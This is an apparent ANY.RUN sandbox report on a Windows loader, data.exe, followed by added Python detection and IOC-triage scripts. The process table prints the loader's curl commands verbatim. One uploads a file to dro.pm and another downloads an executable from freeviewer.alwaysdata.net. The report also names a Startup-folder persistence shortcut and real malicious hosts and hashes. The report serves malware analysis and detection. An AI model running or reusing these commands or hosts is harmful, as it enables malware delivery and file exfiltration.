File name:

data.exe

Full analysis: https://app.any.run/tasks/82fe3399-edd7-4c19-9cdd-6deaa3da6474
Verdict: Malicious activity
Threats:

A loader is malware whose purpose is to get a foothold on a device and deliver further payloads. Once running it profiles the victim's system and then fetches and installs other threats, such as trojans or stealers. Loaders are usually distributed through phishing emails and links, relying on social engineering to get the user to download and run the executable, and they rely on evasion and persistence techniques to stay undetected.

Analysis date: May 16, 2025, 22:16:07
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
auto-startup
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections
MD5:

87D310B74D13FF2540056557FC92C6F1

SHA1:

3E9E8A15DC7AD259A36E1497C6B1664DB1E19919

SHA256:

8DD4D2DCC0A7E85D02D812C710B5256F803AC2E2123AA4AF1787F5027EF17F26

SSDEEP:

98304:RNJMIxgSvzG4lHdmwpZ0cuNKOUUUmes0qh54C80mmXD+UZibGlqXnz0RZKIFfeUB:xOU7m

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Create files in the Startup directory

      • data.exe (PID: 2236)
    • Executing a file with an untrusted certificate

      • curl.exe (PID: 5072)
      • curl.exe (PID: 7020)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • data.exe (PID: 2236)
      • curl.exe (PID: 7020)
    • Reads security settings of Internet Explorer

      • data.exe (PID: 2236)
    • Executing commands from a ".bat" file

      • data.exe (PID: 2236)
    • Starts CMD.EXE for commands execution

      • data.exe (PID: 2236)
    • There is functionality for taking screenshot (YARA)

      • data.exe (PID: 2236)
    • The executable file from the user directory is run by the CMD process

      • curl.exe (PID: 5072)
      • curl.exe (PID: 7020)
    • Process requests binary or script from the Internet

      • curl.exe (PID: 7020)
    • Potential Corporate Privacy Violation

      • curl.exe (PID: 7020)
  • INFO

    • The sample compiled with english language support

      • data.exe (PID: 2236)
    • Create files in a temporary directory

      • data.exe (PID: 2236)
      • curl.exe (PID: 7020)
    • Reads the computer name

      • data.exe (PID: 2236)
      • curl.exe (PID: 5072)
      • curl.exe (PID: 7020)
    • Auto-launch of the file from Startup directory

      • data.exe (PID: 2236)
    • Creates files or folders in the user directory

      • data.exe (PID: 2236)
    • Process checks computer location settings

      • data.exe (PID: 2236)
    • Checks supported languages

      • data.exe (PID: 2236)
      • curl.exe (PID: 7020)
      • curl.exe (PID: 5072)
    • Execution of CURL command

      • cmd.exe (PID: 2692)
    • Checks proxy server information

      • slui.exe (PID: 4920)
    • Reads the software policy settings

      • slui.exe (PID: 4920)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:03:20 10:01:22+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.42
CodeSize: 248320
InitializedDataSize: 174080
UninitializedDataSize: -
EntryPoint: 0x26540
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
No data.
All screenshots are available in the full report
Total processes
126
Monitored processes
6
Malicious processes
3
Suspicious processes
1

Behavior graph

Process tree reconstructed from the "Parent process" fields below ("no specs" marks a process that triggered no signatures):

explorer.exe
  data.exe (PID 2236)
    cmd.exe (PID 2692, no specs)
      conhost.exe (PID 4740, no specs)
      curl.exe (PID 5072)
      curl.exe (PID 7020)
svchost.exe
  slui.exe (PID 4920)

Process information

PID
CMD
Path
Indicators
Parent process
PID:
2236
CMD:
"C:\Users\admin\Desktop\data.exe"
Path:
C:\Users\admin\Desktop\data.exe
Parent process:
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\desktop\data.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\oleaut32.dll
PID:
2692
CMD:
C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\RarSFX0\script.bat" "
Path:
C:\Windows\SysWOW64\cmd.exe
Parent process:
data.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID:
4740
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
4920
CMD:
C:\WINDOWS\System32\slui.exe -Embedding
Path:
C:\Windows\System32\slui.exe
Parent process:
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID:
5072
CMD:
curl -sA cli -F f=@data.exe https://dro.pm/fileman.php
Path:
C:\Users\admin\AppData\Local\Temp\RarSFX0\curl.exe
Parent process:
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
60
Version:
8.12.1
Modules
Images
c:\users\admin\appdata\local\temp\rarsfx0\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\user32.dll
PID:
7020
CMD:
curl http://freeviewer.alwaysdata.net/data.exe --output data.exe --silent
Path:
C:\Users\admin\AppData\Local\Temp\RarSFX0\curl.exe
Parent process:
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.12.1
Modules
Images
c:\users\admin\appdata\local\temp\rarsfx0\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\user32.dll
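The process table above shows the whole chain. data.exe unpacks into %TEMP%\RarSFX0, the folder name a WinRAR self-extracting archive uses, and runs script.bat through cmd.exe; the bundled curl.exe first tries to POST a copy of data.exe to https://dro.pm/fileman.php as a multipart form (exit code 60 is curl's "peer certificate cannot be authenticated with known CA certificates", so TLS verification failed before any request body was sent and that upload did not happen in this run), then downloads data.exe from http://freeviewer.alwaysdata.net over plain HTTP. The Python below is an added example, not ANY.RUN code: it encodes those behaviours as detection logic and runs it over process-creation events constructed from this table. The PPIDs for explorer.exe and svchost.exe are assumptions, since the report gives only parent image names.

```python
"""Detection logic for the loader chain in this report (added example, not ANY.RUN code)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str
    exit_code: Optional[int] = None  # None where the report shows no exit code


# curl exit codes that matter for this chain (from the curl manual)
CURL_EXIT = {0: "ok", 60: "peer certificate cannot be authenticated with known CA certificates"}

# Constructed from the report's process table. PIDs 1000 (explorer.exe) and 900
# (svchost.exe) are assumed; the report names the parents but not their PIDs.
EVENTS = [
    ProcEvent(1000, 0, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2236, 1000, r"C:\Users\admin\Desktop\data.exe", r'"C:\Users\admin\Desktop\data.exe"'),
    ProcEvent(2692, 2236, r"C:\Windows\SysWOW64\cmd.exe",
              r'C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\RarSFX0\script.bat" "'),
    ProcEvent(4740, 2692, r"C:\Windows\System32\conhost.exe",
              r"\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(5072, 2692, r"C:\Users\admin\AppData\Local\Temp\RarSFX0\curl.exe",
              "curl -sA cli -F f=@data.exe https://dro.pm/fileman.php", exit_code=60),
    ProcEvent(7020, 2692, r"C:\Users\admin\AppData\Local\Temp\RarSFX0\curl.exe",
              "curl http://freeviewer.alwaysdata.net/data.exe --output data.exe --silent", exit_code=0),
    ProcEvent(4920, 900, r"C:\Windows\System32\slui.exe", r"C:\WINDOWS\System32\slui.exe -Embedding", exit_code=0),
]

SFX_TEMP = re.compile(r"\\AppData\\Local\\Temp\\RarSFX\d+\\", re.I)   # WinRAR SFX extraction dir
USER_DIR = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\", re.I)               # user-writable location
SCRIPT_RE = re.compile(r"\.(bat|cmd|ps1|vbs|js)\b")
BINARY_EXT = (".exe", ".dll", ".scr")
SCRIPT_EXT = (".bat", ".cmd", ".ps1", ".vbs", ".js")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(events: List[ProcEvent], pid: int) -> List[ProcEvent]:
    """Return the event for pid followed by its ancestors, nearest first."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def analyse(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    findings = []
    for e in events:
        name = basename(e.image)
        cl = e.cmdline.lower()
        # 1) cmd.exe running a script that lives inside an SFX temp folder
        if name == "cmd.exe" and SFX_TEMP.search(e.cmdline) and SCRIPT_RE.search(cl):
            findings.append((e.pid, "sfx_batch_script"))
        if name != "curl.exe":
            continue
        # 2) curl.exe started from a user path: a bundled copy, not the OS one
        if USER_DIR.match(e.image):
            findings.append((e.pid, "curl_from_user_dir"))
        # 3) curl <- cmd.exe <- executable in a user directory: dropper pattern
        chain = ancestry(events, e.pid)
        if len(chain) >= 3 and basename(chain[1].image) == "cmd.exe" and USER_DIR.match(chain[2].image):
            findings.append((e.pid, "user_exe_cmd_curl_chain"))
        args = e.cmdline.split()
        # 4) multipart upload of a local file (-F name=@path): exfiltration attempt
        if any(a in ("-F", "--form") for a in args) and "=@" in e.cmdline:
            findings.append((e.pid, "curl_file_upload"))
            if e.exit_code == 60:
                # handshake failed on certificate verification, so nothing was uploaded
                findings.append((e.pid, "upload_failed_tls_verify"))
        # 5) download written straight to an executable or script name
        outs = [args[i + 1] for i, a in enumerate(args[:-1]) if a in ("-o", "--output")]
        if any(o.lower().endswith(BINARY_EXT + SCRIPT_EXT) for o in outs):
            findings.append((e.pid, "curl_exe_download"))
    return findings


if __name__ == "__main__":
    for pid, tag in analyse(EVENTS):
        print(pid, tag)
```

Findings come out per PID, so the same logic ports directly to a SIEM rule keyed on process-creation events (Sysmon event 1 or its EDR equivalent): the three checks on curl.exe plus the cmd.exe-from-RarSFX check together describe this chain without depending on the domains, which a fresh build of the loader would change first.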
Total events
4 314
Read events
4 314
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
1
Text files
3
Unknown types
0

Dropped files

PID | Process | Filename | Type

2236 | data.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\libcurl-x64.def | text
MD5:FD1FA95AC2FBBD4D3CF7A91CD46BCD95
SHA256:FC8449996B7661B9AE9C0ED67C847F1C7241A9EF3DB717A5D578012F34FB00DA
2236 | data.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\curl.exe | executable
MD5:CB023D965BF72E5FEBAE7AC8E48DD136
SHA256:FBBBC793282F35D24C22A52BB8F66E42705B8473B046EA6D1C9DEF602FB3E707
2236 | data.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\libcurl-x64.dll | executable
MD5:3B3350CEAC1A9296CF396E10D8166761
SHA256:F49E0F2AA68B7F0F5EAC0B17526A61A5C388CC1C45703182524270282EECA135
7020 | curl.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\data.exe | executable
MD5:87D310B74D13FF2540056557FC92C6F1
SHA256:8DD4D2DCC0A7E85D02D812C710B5256F803AC2E2123AA4AF1787F5027EF17F26
2236 | data.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk | binary
MD5:5C5C2271E87586BC6DEC2A1441C1E20D
SHA256:9B0AB149036AD7056A4E5CC7407033FBB97BF7EEC819A30D11D2B436EE56F297
2236 | data.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\script.bat | text
MD5:DE985AE000038B92D0DFEAD8F92DF43C
SHA256:30E0178DD59A5EF8A63A6AF28F050EBBBB13215F81EA8D2F0DF70240B0F988D0
2236 | data.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\curl-ca-bundle.crt | text
MD5:1A7DE82BB9F0FCC779CA18A7A9310898
SHA256:50A6277EC69113F00C5FD45F09E8B97A4B3E32DAA35D3A95AB30137A55386CEF
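Two things in the dropped-files list deserve a closer look. The file curl.exe (PID 7020) wrote to RarSFX0\data.exe carries the same MD5 and SHA256 as the submitted sample, so the loader fetched a byte-identical copy of itself from freeviewer.alwaysdata.net, and the Discord.lnk shortcut written to the user's Start Menu\Programs\Startup folder is the persistence behind the "auto-startup" tag. The Python below is an added example, not ANY.RUN code: it parses dropped-file rows in the run-together PID/process/path/type form that raw exports of this table use, then applies those two checks plus a temp-directory check and collects the hashes as an IOC set. The input rows are copied from this report.

```python
"""Triage of an ANY.RUN 'Dropped files' table (added example, not ANY.RUN code)."""
import re
from pathlib import PureWindowsPath
from typing import Dict, List, Tuple

# SHA256 of the submitted sample, from the report header
SAMPLE_SHA256 = "8DD4D2DCC0A7E85D02D812C710B5256F803AC2E2123AA4AF1787F5027EF17F26"

# Rows as exported: PID, process name, path and type run together, hashes on the next lines
RAW = r"""
2236data.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\libcurl-x64.deftext
MD5:FD1FA95AC2FBBD4D3CF7A91CD46BCD95
SHA256:FC8449996B7661B9AE9C0ED67C847F1C7241A9EF3DB717A5D578012F34FB00DA
2236data.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\curl.exeexecutable
MD5:CB023D965BF72E5FEBAE7AC8E48DD136
SHA256:FBBBC793282F35D24C22A52BB8F66E42705B8473B046EA6D1C9DEF602FB3E707
2236data.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\libcurl-x64.dllexecutable
MD5:3B3350CEAC1A9296CF396E10D8166761
SHA256:F49E0F2AA68B7F0F5EAC0B17526A61A5C388CC1C45703182524270282EECA135
7020curl.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\data.exeexecutable
MD5:87D310B74D13FF2540056557FC92C6F1
SHA256:8DD4D2DCC0A7E85D02D812C710B5256F803AC2E2123AA4AF1787F5027EF17F26
2236data.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnkbinary
MD5:5C5C2271E87586BC6DEC2A1441C1E20D
SHA256:9B0AB149036AD7056A4E5CC7407033FBB97BF7EEC819A30D11D2B436EE56F297
2236data.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\script.battext
MD5:DE985AE000038B92D0DFEAD8F92DF43C
SHA256:30E0178DD59A5EF8A63A6AF28F050EBBBB13215F81EA8D2F0DF70240B0F988D0
2236data.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\curl-ca-bundle.crttext
MD5:1A7DE82BB9F0FCC779CA18A7A9310898
SHA256:50A6277EC69113F00C5FD45F09E8B97A4B3E32DAA35D3A95AB30137A55386CEF
"""

# PID digits, then a process image name, then a drive path, then the type word at end of line.
# The non-greedy path group stops where one of the known type words ends the line.
ROW = re.compile(r"^(\d+)([A-Za-z0-9_.-]+\.exe)([A-Za-z]:\\.*?)(text|executable|binary)$")
SCRIPT_EXT = (".bat", ".cmd", ".ps1", ".vbs", ".js")


def parse_dropped(raw: str) -> List[Dict]:
    records, cur = [], None
    for line in raw.strip().splitlines():
        m = ROW.match(line)
        if m:
            cur = {"pid": int(m[1]), "process": m[2], "path": m[3], "type": m[4]}
            records.append(cur)
        elif cur is not None and line.startswith(("MD5:", "SHA256:")):
            algo, digest = line.split(":", 1)
            cur[algo.lower()] = digest.strip().lower()
    return records


def triage(records: List[Dict], sample_sha256: str) -> List[Tuple[str, str]]:
    findings = []
    for r in records:
        low = r["path"].lower()
        name = PureWindowsPath(r["path"]).name.lower()
        # the loader wrote a file identical to the analysed sample: it re-fetched itself
        if r.get("sha256") == sample_sha256.lower():
            findings.append((name, "identical_to_sample"))
        # anything in the per-user Startup folder runs at logon
        if "\\start menu\\programs\\startup\\" in low:
            findings.append((name, "startup_folder_persistence"))
        in_temp = "\\appdata\\local\\temp\\" in low
        if in_temp and r["type"] == "executable":
            findings.append((name, "executable_in_temp"))
        if in_temp and name.endswith(SCRIPT_EXT):
            findings.append((name, "script_in_temp"))
    return findings


def ioc_hashes(records: List[Dict], algo: str = "sha256") -> List[str]:
    """Deduplicated, sorted hashes for blocklists or retro-hunts."""
    return sorted({r[algo] for r in records if algo in r})


if __name__ == "__main__":
    recs = parse_dropped(RAW)
    for name, tag in triage(recs, SAMPLE_SHA256):
        print(f"{name}: {tag}")
    print(len(ioc_hashes(recs)), "sha256 IOCs")
```

The hash set includes the bundled curl.exe and libcurl-x64.dll, which are legitimate curl 8.12.1 binaries; block or hunt on those only in combination with the RarSFX path, or you will match every other tool that ships the same curl build.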
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
44
DNS requests
16
Threats
1

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
(one request per line; cells that were empty in the export are omitted)

7020 | curl.exe | GET | 200 | 185.31.40.17:80 | http://freeviewer.alwaysdata.net/data.exe | unknown | unknown
1280 | SIHClient.exe | GET | 200 | 23.48.23.156:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
1280 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl | unknown | whitelisted
1280 | SIHClient.exe | GET | 200 | 23.48.23.156:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | unknown | whitelisted
1280 | SIHClient.exe | GET | 200 | 23.48.23.156:80 | http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl | unknown | whitelisted
1280 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
1280 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl | unknown | whitelisted
1280 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl | unknown | whitelisted
1280 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.2.crl | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
(one connection per line; cells that were empty in the export are omitted)

4 | System | 192.168.100.255:137 | whitelisted
4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:138 | whitelisted
51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
3216 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
7020 | curl.exe | 185.31.40.17:80 | freeviewer.alwaysdata.net | Alwaysdata Sarl | FR | unknown
5072 | curl.exe | 86.80.32.182:443 | dro.pm | KPN B.V. | NL | unknown
1280 | SIHClient.exe | 172.202.163.200:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | GB | whitelisted
1280 | SIHClient.exe | 23.48.23.156:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
1280 | SIHClient.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
whitelisted
google.com
  • 142.250.185.110
whitelisted
client.wns.windows.com
  • 172.211.123.250
  • 172.211.123.249
whitelisted
freeviewer.alwaysdata.net
  • 185.31.40.17
unknown
dro.pm
  • 86.80.32.182
unknown
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.181
  • 23.48.23.190
  • 23.48.23.161
  • 23.48.23.191
  • 23.48.23.158
  • 23.48.23.194
  • 23.48.23.169
  • 23.48.23.185
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted

Threats

PID | Process | Class | Message

7020 | curl.exe | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP
No debug info